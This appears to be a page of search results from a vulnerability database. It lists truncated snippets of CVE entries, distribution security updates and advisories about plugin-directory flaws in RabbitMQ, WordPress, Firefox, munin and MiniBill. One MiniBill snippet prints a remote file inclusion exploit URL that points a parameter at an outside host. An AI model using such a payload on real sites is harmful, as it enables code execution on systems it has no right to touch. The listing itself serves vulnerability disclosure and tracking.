CVE-2021-22117

RabbitMQ installers on Windows prior to version 3.8.16 do not harden plugin directory permissions, potentially allowing attackers with sufficient local filesystem permissions to add arbitrary plugins...

Pivotal Software RabbitMQ 代码注入漏洞

Pivotal Software RabbitMQ is a suite of open source message broker software from Pivotal Software, USA, that implements the Advanced Message Queuing Protocol AMQP. A code injection vulnerability exists in RabbitMQ that stems from the RabbitMQ installer on Windows not hardening the plugin director...

PT-2021-3265 · Rabbitmq · Rabbitmq

Name of the Vulnerable Software and Affected Versions: RabbitMQ versions prior to 3.8.16 Description: The issue is related to insufficient access control in the plugin directory of RabbitMQ installers on Windows. This could potentially allow attackers with sufficient local filesystem permissions ...

Autoptimize < 2.7.8 - Authenticated Stored XSS via File Upload

The plugin does not check for malicious files such as .html in the archive uploaded via the 'Import Settings' feature. As a result, it is possible for a high privilege user to upload a malicious file containing JavaScript code inside an archive which will execute when a victim visits index.html...

DEBIAN-CVE-2018-14028

In WordPress 4.9.7, plugins uploaded via the admin area are not verified as being ZIP files. This allows for PHP files to be uploaded. Once a PHP file is uploaded, the plugin extraction fails, but the PHP file remains in a predictable wp-content/uploads location, allowing for an attacker to then...

A Deep Dive into Database Attacks [Part IV]: Delivery and Execution of Malicious Executables through SQL Commands (MySQL)

In a previous post we covered different techniques for execution of SQL and OS commands through Microsoft SQL server that can be used for delivering and executing malicious payloads on the target system. In this post we’ll discuss the same topic for MySQL database. Creating an executable directly...

Security update for MozillaFirefox (important)

MozillaFirefox was updated to 52.5.0esr boo1068101 MFSA 2017-25 CVE-2017-7828: Fixed a use-after-free of PressShell while restyling layout CVE-2017-7830: Cross-origin URL information leak through Resource Timing API CVE-2017-7826: Memory safety bugs fixed in Firefox 57 and Firefox ESR 52.5 Also...

openSUSE Security Update : MozillaFirefox (openSUSE-2017-1279)

MozillaFirefox was updated to 52.5.0esr boo1068101 MFSA 2017-25 - CVE-2017-7828: Fixed a use-after-free of PressShell while restyling layout - CVE-2017-7830: Cross-origin URL information leak through Resource Timing API - CVE-2017-7826: Memory safety bugs fixed in Firefox 57 and Firefox ESR 52.5...

ovirt-engine-dwh: incorrect permissions on plugin file containing passwords

It was discovered that a directory shared between the ovirt-engine-dwhd service and a plug-in used during the service's startup had incorrect permissions. A local user could use this flaw to access files in this directory, which could potentially contain sensitive information...

[DLA 20-1] munin security update

Package : munin Version : 1.4.5-3+deb6u1 CVE ID : CVE-2012-3512 CVE-2013-6048 CVE-2013-6359 Christoph Biedl munin-node: more secure state file handling, introducing a new plugin state directory root, owned by uid 0. Then each plugin runs in its own UID plugin state directory, owned by that UID...

DLA-20-1 munin - security update

Bulletin has no description...

MiniBill <= 1.22b config[plugin_dir] Remote File Inclusion Vulnerabilities

No description provided by source. MiniBill v1.22 Beta Remote File Inclusion Vulnerability Download: http://www.ultrize.com/minibill/download/minibill-20060714.zip Found By: the master exploit: http://Target/Path/actions/ipn.php?configplugindir=http://cmd.gif?...

WordPress All-In-One SEO Pack Vulnerabilities Patched

A web design firm has patched two privilege escalation vulnerabilities that could have led to cross-site scripting attacks in a popular WordPress plugin it manages. If left unpatched, the issue could leave potentially millions of websites vulnerable. The problem exists in old versions of the All ...

WordPress Abtest Directory Traversal

------------------------- Affected products: ------------------------- Product : wordpress Plugin in name : abtest File name : abtestadmin.php ---------- Details: ---------- The file abtestadmin.php of the plugin abtest is vulnerable to a Directory traversal attack see...

MYSQL UDF - Can't open shared library studies-vulnerability and early warning-the black bar safety net

Ninty 's blog mysqlin support of the UDF extension, so that we can call the DLL inside the function to achieve some special features. But for the UDF specific limits, MYSQL versions are different. The following recording: I heard, just heard, didn't do testing on MYSQL 4.1 previously, can be all...

CVE-2009-3229

The core server component in PostgreSQL 8.4 before 8.4.1, 8.3 before 8.3.8, and 8.2 before 8.2.14 allows remote authenticated users to cause a denial of service backend shutdown by "re-LOAD-ing" libraries from a certain plugins directory...

CVE-2007-4013

Multiple unspecified vulnerabilities in 1 Net6Helper.DLL aka Net6Launcher Class 4.5.2 and earlier, 2 npCtxCAO.dll aka Citrix Endpoint Analysis Client in a Firefox plugin directory, and 3 a second npCtxCAO.dll aka CCAOControl Object before 4.5.0.0 in Citrix Access Gateway Standard Edition before...

CVE-2006-4489

Multiple PHP remote file inclusion vulnerabilities in MiniBill 2006-07-14 1.2.2 allow remote attackers to execute arbitrary PHP code via 1 a URL in the configincludedir parameter in actions/ipn.php or 2 an FTP path in the configplugindir parameter in include/initPlugins.php...

MiniBill <= 1.22b config[plugin_dir] Remote File Inclusion Vulnerabilities

Exploit for unknown platform in category web applications ========================================================================== MiniBill = 1.22b configplugindir Remote File Inclusion Vulnerabilities ========================================================================== MiniBill v1.22 Bet...